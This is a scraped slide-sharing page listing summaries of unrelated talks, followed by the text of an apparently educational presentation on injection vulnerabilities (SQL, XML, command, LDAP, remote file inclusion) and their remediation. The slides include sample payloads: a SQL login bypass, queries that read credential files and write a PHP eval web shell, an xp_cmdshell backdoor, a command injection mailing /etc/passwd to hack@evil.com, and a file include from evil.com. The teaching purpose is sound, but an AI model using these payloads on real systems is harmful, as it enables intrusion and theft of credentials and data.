This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
Misconfiguration is define as configuration mistakes that results in unintended application behavior that includes misuse of default passwords, privileges, and excessive debugging information disclosure
Web application security is the process of securing confidential data stored online from unauthorized access and modification. This is accomplished by enforcing stringent policy measures.
A web threat is any threat that uses the World Wide Web to facilitate cybercrime. Web threats use multiple types of malware and fraud, all of which utilize HTTP or HTTPS protocols, but may also employ other protocols and components, such as links in email or IM, or malware attachments or on servers that access the Web.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Devbeat Conference - Developer First SecurityMichael Coates
Topics include:
- Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
- Who’s Monitoring Your Traffic? — Encrypting in Transit
Secure Data Storage & Protection — Correct Password
-Storage & Data Protection
-Growing Threats Plaguing Applications
Misconfiguration is define as configuration mistakes that results in unintended application behavior that includes misuse of default passwords, privileges, and excessive debugging information disclosure
Web application security is the process of securing confidential data stored online from unauthorized access and modification. This is accomplished by enforcing stringent policy measures.
A web threat is any threat that uses the World Wide Web to facilitate cybercrime. Web threats use multiple types of malware and fraud, all of which utilize HTTP or HTTPS protocols, but may also employ other protocols and components, such as links in email or IM, or malware attachments or on servers that access the Web.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Devbeat Conference - Developer First SecurityMichael Coates
Topics include:
- Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
- Who’s Monitoring Your Traffic? — Encrypting in Transit
Secure Data Storage & Protection — Correct Password
-Storage & Data Protection
-Growing Threats Plaguing Applications
Today is the age of computer and internet. More and more people are creating their own websites to market their products and earn more profit from it. Having our own website will definitely help us in getting more customers purchasing our products but at the same time we can also attract hackers to play around with our website. If we have not taken enough care to protect our website from hackers then our business can even come to an end because of these hackers. If we own a website, then we might know the importance of ensuring that our website is safe from viruses and hackers.
After going online most of the website designers think that their work is over. They have delivered what they were paid for and now they will be available for the maintenance of the site only. But sometimes the main problem starts after publishing the website. What if the website they have built suddenly start showing different stuff from what was already present there? What if weird things start appearing on the pages of our website? And most horribly what if the password of our login panel has changed and we are not able to login into our website. This is called hacking, a website hacking. We have to figure out how this happened so we can prevent it from happening again. In this seminar we are going to discuss some of major website hacking techniques and we are also going to discuss how to prevent website from getting vulnerable to different attacks currently use by various hackers.
Edgis Sharing Session – SQL Injection and Denial-of-Service Attacks
at School of Digital Media and Infocomm Technology, Singapore Polytechnic
September, 2011
Here you can find the slides that accompany my “SPA Secure Coding Guide”, this presentation go through a set of security best practices specially targeted towards developing Angular applications with ASP.Net Web Api backends.
It comes with a WebApi example project available on GitHub that provides several code examples of how to defend yourself. The example app is based on the famous "Tour of Heroes" Angular app used throughout the Angular documentation.
It first introduce general threat modelling before explaining the most current type of attacks Asp.Net Web API are vulnerable to .
It is designed to serve as a secure coding reference guide, to help development teams quickly understand Asp.Net Core secure coding practices.
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
OWASP Top 10 vs Drupal
Abstract: Drupal is the most used and well-known open source content management system in the world. Created by Dries Buytaert years ago it has grown with the support of a big community. Drupal 7 is already released and there is an entire ecosystem for Drupal and Drupal web agencies.
During this presentation we will discuss the findings of an automated static code analysis of Drupal 6 and Drupal 7 and how Drupal protects against the OWASP Top 10 Application Security Risks. We will explain the security weaknesses that remain when you use Drupal and what you can implement to have a secure cloud server running Drupal.
A talk Khaled and myself gave at an Owasp conference 2015 in Doha, Qatar. This explains the cross window redirect "vulnerability" which allows phishers to redirect other browser tabs/windows.
The talk I gave on social engineering in the Owasp chapter in Doha, Qatar. This covers few of the same points which I talked about in the helpag spotlight event.
The presentation I gave in Help AG's spotlight event on June 1,2 and 4. This talk is about social engineering and illustrates the things we find with customers in the region.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
2. About Me
• Who am I?
– Michael Hendrickx
– Information Security Consultant, currently
working for UAE Federal Government.
– Assessments, Security Audits, secure coding
3. • Owasp Top 10 – 2013
– A1: Injection
– A2: Broken Authentication and Session Mgmt
– A3: Cross Site Scripting
– A4: Insecure Direct Object References
– A5: Security Misconfiguration
– A6: Sensitive Data Exposure
– A7: Missing Function Level Access Control
– A8: Cross Site Request Forgery
– A9: Using Components with Known Vulns
– A10: Invalidated Redirects and Forwards
4. How bad is it?
• Oct ‘13: 100k $ stolen from a California ISP
http://thehackernews.com/2013/10/hacker-stole-100000-from-users-
of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water,
gas, telephone…
http://news.softpedia.com/news/RedHack-Breaches-Istanbul-
Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolen
http://www.darkreading.com/attacks-breaches/adobe-hacker-says-
he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! User accounts stolen
http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-
account-safe/
5. What is Injection?
• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ..)
• Submitting data has a special meaning to
underlying technologies
• Mixing commands and data.
• Types:
– SQL Injection
– XML Injection
– Command Injection
Web
DBOS
Backend
System
6. Injection analogy
• A case is filed against me
• I write my name as
“Michael, you are free to go”
• Judge announces case:
“Calling Michael, you are free to go.”
• Bailiff lets me go.
Mix of “data” and “commands”.
8. IT underlying technology?
• A webserver parses and “pass on” data
Web Server
http://somesite.com/msg.php?id=8471350
DB
OS
Script performs business logic and
parses messages to backend.
“Hey, get me a message from the
DB with id 8471350”
9. SQL Injection
• Dynamic script to look up data in DB
Web Server
http://somesite.com/login.php?name=michael&password=secret123
DB
SELECT * FROM users WHERE
name = ’michael’ AND
password = ‘secret123’
http://somesite.com/msg.aspx?id=8471350
SELECT * FROM messages
WHERE id = 8471350
Get indirect access to the
database
10. SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DB
Query is incorrectly, will throw error (if not
suppressed).
SELECT * FROM users WHERE
name = ’mich’ael’ AND
password = ‘secret123’
11. SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DB
Query is incorrectly, will throw error (if not
suppressed).
SELECT * FROM users WHERE
name = ’mich’ael’ AND
password = ‘secret123’
12. SQL Injection
• Insert value with ’ (single quote)
Web Server
http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a
DB
SELECT * FROM users WHERE
name = ’michael’ AND
password = ’test ’ OR ‘a’ = ‘a’
‘a’ will always equal ‘a’, and thus log in this user.
13. SQL Injection
• More advanced possibilities:
– Read files*:
• MySQL: SELECT
HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO
DUMPFILE ‘/var/www/site.com/htdocs/test.txt’;
• MS SQL:
CREATE TABLE newfile(data text);
...
BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH
(CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’);
*: If you have the right privileges
14. SQL Injection
• Write files
– MySQL:
CREATE TABLE tmp(data longblog);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>
...
SELECT data FROM tmp INTO DUMPFILE
‘/var/www/site.com/htdocs/test.php’;
– MS SQL:
CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’);
*: Again, If you have the right privileges
15. SQL Injection: SQLMap
• SQL Map will perform
attacks on target.
• Dumps entire tables
• Even entire databases.
• Stores everything in CSV
• More info on http://sqlmap.org
16. HTML Injection
• Possible to include HTML tags into fields
• Used to render “special” html tags where
normal text is expected
• XSS possible,
rewrite the
DOM
17. HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in phishing attack
Button goes to different
form, potentially stealing
credentials.
18. XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML
web services (as SOAP, …)
Web Server
Web service
Web service
DB
Backend
19. XML Injection
http://somesite.com/create.php?name=michael&email=mh@places.ae
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:10:01</date>
<name>$name</name>
<email>$email</email>
</user>
http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a
dmin><email>mh@places.ae
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:24:48</date>
<name>michael</name>
<email>a@b.c</email><admin>true</admin><email>mh@places.ae</email>
</user>
Web app to create a new user
20. Command Injection
• Web application performs Operating System
tasks
– Execute external programs / scripts
– List files
– Send email
Web Server OS
21. Command Injection
• Dynamic script to share article
Web Server
DBhttp://somesite.com/share.php?to=mh@places.ae
OS
$ echo “check this out” | mail –s “share” mh@places.ae
$ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd
http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
22. LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User information
– Software
– Computers
Web Server
LDAP
Server
23. LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
25. Remote File Injection
• Color chooser
• Color will load new file with color codes
(blue.php, red.php, …)
• Attacker can upload malicious PHP file to an
external server
http://somesite.com/mypage.php?color=blue
<?php
if(isset($_GET[„color‟])){
include($_GET[„color‟].„.php‟);
}
?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt
Will fetch and load http://evil.com/evil.txt.php
26. Remote File Injection
• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM,
etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
27. Remediation
• Implement Web Application Firewall (WAF)
• Prevents most common attacks
– Not 100% foolproof
• Make sure it can decrypt SSL
Web Server DBWAF
28. Remediation
• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force formats (numbers, email addresses, dates…)
– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards
– Use prepared SQL statements
– Vendor specific guidelines
– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
29. Remediation
• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with restricted privileges
– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in sandboxed environment
• Suppress error messages
• Enable exception notifications
– If something strange happens, reset session and notify
administrator.
30. Summary
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.